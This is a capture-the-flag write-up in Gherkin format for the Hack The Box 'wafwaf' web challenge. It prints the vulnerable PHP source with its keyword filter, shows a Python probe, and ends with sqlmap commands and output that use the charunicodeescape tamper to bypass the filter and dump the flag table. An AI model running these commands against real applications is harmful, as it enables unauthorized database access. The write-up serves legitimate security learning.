## Version 2.0
## language: en

Feature: wafwaf
  Site:
    Hackthebox
  Category:
    Web
  User:
    lkkpp
  Goal:
    Get the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Windows         | 10        |
    | Wireshak        | 3.4.0     |
    | Firefox         | 82.0.3    |
    | Sqlmap          | 1.4.11    |

  Machine information:
    Given I am accessing the challenge through its section
    When I open the challenge section
    And I see the following sentence
    """
    My classmate Jason made this small and super
    secure note taking application, check it out!
    """
    Then it is possible initialize the instance for the challenge

  Scenario: Success: Analyze the challenge
    Given the challenge starts a web service
    And some information of the operation is displayed
    When I can more easily analyze the challenge [evidences](source.png)
    """
    <?php error_reporting(0);
    require 'config.php';

    class db extends Connection {
        public function waf($s) {
            if (preg_match_all('/'. implode('|', array(
                '[' . preg_quote("(*<=>|'&-@") . ']',
                'select', 'and', 'or', 'if', 'by', 'from',
                'where', 'as', 'is', 'in', 'not', 'having'
            )) . '/i', $s, $matches)) die(var_dump($matches[0]));
            return json_decode($s);
        }

        public function query($sql) {
            $args = func_get_args();
            unset($args[0]);
            return parent::query(vsprintf($sql, $args));
        }
    }

    $db = new db();

    if ($_SERVER['REQUEST_METHOD'] == 'POST') {
        $obj = $db->waf(file_get_contents('php://input'));
        $db->query("SELECT note FROM notes WHERE assignee = '%s'", $obj->user);
    } else {
        die(highlight_file(__FILE__, 1));
    }
    ?>
    """
    And at first glance I see a vulnerability of type SQL injection
    """
    $db->query("SELECT note FROM notes WHERE assignee = '%s'", $obj->user);
    """
    When escaping the single quotes in the query it is possible to exploit it
    And the challenge is that I can't just escape the quotes
    Given a custom WAF is implemented
    """
    public function waf($s) {
        if (preg_match_all('/'. implode('|', array(
            '[' . preg_quote("(*<=>|'&-@") . ']',
            'select', 'and', 'or', 'if', 'by', 'from',
            'where', 'as', 'is', 'in', 'not', 'having'
        )) . '/i', $s, $matches)) die(var_dump($matches[0]));
        return json_decode($s);
    }
    """
    Then I can conclude that it is vulnerable to SQLi
    And it is necessary to bypass the WAF

  Scenario: Success: Identifying the type of SQL injection manually
    Given I know the site it is vulnerable to SQLi
    When my idea is to identify what type of injection it is
    And first I wrote a python script to trigger the vulnerability
    """
    import requests
    import json

    data = {'user':"payload"}

    r = requests.post("http://143.110.160.251:32031/", data=json.dumps(data))

    print (r.text)
    """
    And when I see that I do not get any explicit response from the server
    Then I can say that it is a Time Based Blind SQL Injection

  Scenario: Fail: Exploiting the bug manually
    Given the idea is to exploit the SQLi
    When I try many ways to bypass the WAF manually
    And control the query with multiple escape methods
    """
    )
    \
    %27
    \x27
    \u27
    \\'
    \'
    \\
    """
    Then I was not able to control the query manually

  Scenario: Success: Exploiting the bug with Sqlmap
    Given I spent a lot of time trying tampers to bypass the WAF
    """
    Tampers are scripts that allow to modify the payloads
    with the purpose of evading filters and WAF's
    """
    When I found one called "charunicodeescape"
    And as its note indicates it is useful for JSON contexts
    """
    Notes:
        * Useful to bypass weak filtering and/or WAFs in JSON contexes
    """
    Then the exploitation becomes simple
    """
    $ sqlmap.py -r request_info -p user --random-agent --level 5
    --risk 3 --tamper=charunicodeescape --dbs
    [10:21:18] [INFO] retrieved: db_m8452
    [10:22:55] [INFO] retrieved: mysql
    [10:23:55] [INFO] retrieved: p
    [10:24:27] [ERROR] invalid character detected. retrying..
    [10:24:27] [WARNING] increasing time delay to 4 seconds
    erformance_schema
    [10:28:08] [INFO] retrieved: sys
    available databases [5]:
    [*] db_m8452
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sys
    """
    Given the attack is done by sqlmap I decided to learn a bit from it
    And I used Wireshark to capture the packets containing the payload
    """
    [evidences](catchpacket.png)
    [evidences](heavypayload.png)
    [evidences](encodedpayload.png)
    [evidences](payloaddbs.png)
    [evidences](payloadwire.png)
    """
    And continuing the attack I can retrieve the tables from the database
    """
    $ sqlmap.py -r request_info -p user --random-agent --level 5
    --risk 3 --tamper=charunicodeescape -D db_m8452 --tables
    [10:31:06] [INFO] retrieved:
    [10:31:12] [INFO] adjusting time delay to 2 seconds due to good response
    definitely_not_a_flag
    [10:34:13] [INFO] retrieved: notes
    Database: db_m8452
    [2 tables]
    +-----------------------+
    | definitely_not_a_flag |
    | notes                 |
    +-----------------------+
    """
    And finally I dump the table "definitely_not_a_flag"
    Then I get the flag [evidences](flag.png)
    """
    $ sqlmap.py -r request_info -p user --random-agent --level 5
    --risk 3 --tamper=charunicodeescape -D db_m8452 -T definitely_not_a_flag
    --columns --dump
    Database: db_m8452
    Table: definitely_not_a_flag
    [1 entry]
    +-----------------------------------+
    | flag                              |
    +-----------------------------------+
    | HTB{***_w4f***_my_w4y_*****_h3r3} |
    +-----------------------------------+
    """
